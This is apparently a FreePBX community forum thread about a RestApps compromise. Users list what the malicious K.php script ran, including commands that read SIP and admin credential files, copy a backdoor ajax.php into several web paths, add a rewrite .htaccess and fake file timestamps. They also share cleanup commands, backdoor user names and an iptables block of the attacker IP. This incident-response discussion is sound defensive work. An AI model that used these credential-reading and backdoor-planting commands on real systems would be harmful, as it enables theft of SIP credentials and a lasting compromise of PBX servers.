K.php - a RestApps malicious script

Exploit script steals SIP information and configs:

ls -la
ps -aux --forest
asterisk -rx ‘core show channels’
asterisk -rx ‘sip show peers’
cat /etc/elastix.conf
cat /etc/asterisk/sip_additional.conf
cat /etc/asterisk/extensions_custom.conf
cat /etc/amportal.conf

So after clean you need to change all passwords in internal and external SIP accounts

In my case exploit modify some ajax.php, config.php, .htaccess and create self scripts.
So I deleted them and reinstall modules for original scripts versions.

Some exploit modifications:

/var/www/html/admin/views/ajax.php
mkdir -p /var/www/html/digium_phones/
mkdir -p /var/www/html/rest_phones/
cp /var/www/html/admin/views/ajax.php /var/www/html/rest_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/modules/core/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/digium_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/js/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/ajax.php
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php

RewriteEngine On

enable symbolic links

Options +FollowSymLinks
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^\s+ config.php [L] /var/www/html/admin/views/.htaccess

Changed ~/.bashrc and ~/.bash_profile is reason of command line inaccessible after login without ability FreePBX connect to ip 37.49.230.74

1 Like

after changing all the sip account passwords under the extensions module I’m assuming will need to re-generate all the profiles in EPM?

getting failed to authenticate as ‘admin’ in the asterisk logs after changing the asterisk manager password in Settings > advanced settings

UPDATE: had to change the AMPMGRPASS entry in /etc/asterisk/extensions_additional.conf to match the setting that was changed in the UI Advanced settings ‘manager password’

1 Like

Thanks for this info. I’m new to freepbx, and only somewhat familiar with debugging this sort of thing. I think I’m fine, here, there is no evidence as far as these tips go.

My question:

I’ve looked through the wiki and cve, and these forums, but I can’t quite understand how this exploit might reach the system.

I don’t have any external users, I’m set up at the moment with a hardware server natted behind a firewall, with only port 80 TCP for letsencrypt and udp 10000:20000 forwarded to the server, and responsive firewall enabled for let’s encrypt, and with networks and interfaces tight, and intrusion dectection enabled on the server

Would this setup prevent the vector for this particular attack?

Thanks

Meaning, you have the GUI running on a different port?
Then I believe you should be good. The exploit is in RestApps. If you can browse to pbx.domain/restapps then you are/were at risk.

when I browse to pbx.domain/restapps on a “cleaned” system I get this…

{“application_name”:null,“application_display”:null,“page_name”:null,“type”:“display”,“exitPath”:null,“layout”:,“action”:,“error”:[{“reason”:400,“display”:“Phone Apps module not licensed.”}]}

if I use pbx.domain/RestApps I get a 404 not found

there seems to be no difference in machines that were compromised or not. Although all have long had the restapps updated to the patched version…

My response was to @cleftstone’s post, to which I assume that he has port 80 set only for LE verification (can be set in System Admin)
I am not sure if that exposes RestApps. If it doesn’t then he’s good.

1 Like

I believe it is correct
xxxtedtwefd.com/admin/config.php?display=sysadmin&view=portmgmt

i see no alternative to openvpn

Do you have SysAdmin Pro and is your PBX up to date? [FREEPBX-12422] Request that OpenVPN Server port be user configurable in Sysadmin - Sangoma Issue Tracker

yes I have sysadmin, updated. It would be interesting wireguard hope me well I opened an issue

do you have sysadmin?

Do you have Sysadmin Pro? What version of SysAdmin do you have?

pro=yes
16.0.6 why?

Wanted to make sure that it is greater than the version specified in that feature request

:slight_smile: I understand

latest fun… Have one system with all D series phones using OpenVPN. After cleaning out the hacked files the phones will not connect using OpenVPN. Just sit there contacting sip:[email protected]

also, anytime I make a change now and hit the apply button in the UI, it pops up an error message

There was an error during reload: Unknown Error. Please Run: fwconsole reload --verbose

if I run the fwconsole reload it does apply the settings. which module needs to be re-installed to fix this?

UPDATE: Deleted all the profiles under the system admin > VPN Server and then enabled VPN in user manager again to re-create them. Apply button issue went away. VPN Still not working with phones however.

I was able to get the Phone’s connecting via OpenVPN again. I had to turn off the OpenVPN server, delete all the existing profiles in the OpenVPN server. Then go into user manager, click to edit every user individually, then simply save and apply without making any changes.
Then turn on the VPN server again and ensure that “routing” was off and “auto renew” was off.
Then I went into each VPN profile and hard coded the IP’s. (Prob not necessary but it’s always worked better for me this way).
then rebuilt the phone configs in EPM

Thanks, for the help. I’m almost totally sure I’m ok.

I have gui/admin forced to port 443, only let’s encrypt on port 80, with the responsive fw and responsive letsencrypt rules set, which if I understand correctly should only allow writing to .well-known while credential renewals are underway.

I have force port 4443 in sysadmin portmgnt for rest apps

I’m getting “403 forbidden” on restapps from outside the firewall on http://pbx.xxx.xxx/restapps, and forbidden from inside with http, and {“application_name”:null,“application_display”:null,“page_name”:null,“type”:“display”,“exitPath”:null,“layout”:[],“action”:[],“error”:[{“reason”:400,“display”:“Phone Apps module not licensed.”}]} from inside on https.

Thanks again.

Just remember that while compromised, all of your ‘family jewels’ may have been warehoused.

Also bear in mind that these guys are very clever (one step ahead of Sangoma at least :wink: ) , and likely have long memories.

1 Like

that’s the biotch of this whole situation, have to change all the extension passwords, system passwords, root passwords it’s been a fun 24+ hours so far…

For those who need it, this pretty much cleans it all up and blocks connection to the known IP. Copy and paste the below into your command line in an ssh session. I’d also suggest changing roots password and then changing all extension passwords and web interface account passwords as they’ve collected all that info it looks like.

crontab -u root -r
crontab -u asterisk -r
rm -f /var/www/html/admin/modules/freepbx_ha/license.php
rm -f /var/www/html/admin/views/ajax.php
rm -fr /var/www/html/digium_phones/
rm -fr /var/www/html/rest_phones/
rm -f /var/www/html/rest_phones/ajax.php
rm -f /var/www/html/admin/modules/core/ajax.php
rm -f /var/www/html/digium_phones/ajax.php
rm -f /var/www/html/admin/assets/js/config.php
rm -f /var/www/html/admin/assets/config.php
rm -f /var/www/html/admin/assets/ajax.php
rm -f /var/www/html/admin/views/ajax.php
rm -f /var/www/html/admin/views/.htaccess
rm -f /var/lib/asterisk/bin/devnull2
rm -f /usr/local/asterisk/ha_trigger
rm -f /var/spool/asterisk/tmp/k
rm -f /var/spool/asterisk/tmp/serv
rm -f /tmp/test.sh
rm -f /usr/sbin/sysadmin_ha
userdel -f supports
userdel -f supermaint
userdel -f sugarmaint
fwconsole ma downloadinstall framework --force
fwconsole ma downloadinstall restapps --force
fwconsole ma downloadinstall core --force
fwconsole reload

iptables -A OUTPUT -d 37.49.230.74 -j DROP
/sbin/service iptables save

My guess is that FreePBX distros will fight 'tooth and nails ’ your

iptables -A OUTPUT -d 37.49.230.74 -j DROP
/sbin/service iptables save

But I will guarantee the next vector will not be from 37.49.230.74

 whois -h v4.whois.cymru.com ' -v -f  37.49.230.74'

gives the ASN of the ‘careless provider’. “ABC Consultancy”

If you go through your logs you will see these SQUITTER/ABC SQUATTERS have been probing FreePBX deployments for months, likely yours included (FYI, the real blackhats are not Dutch, nor Icelandic :wink: )

1 Like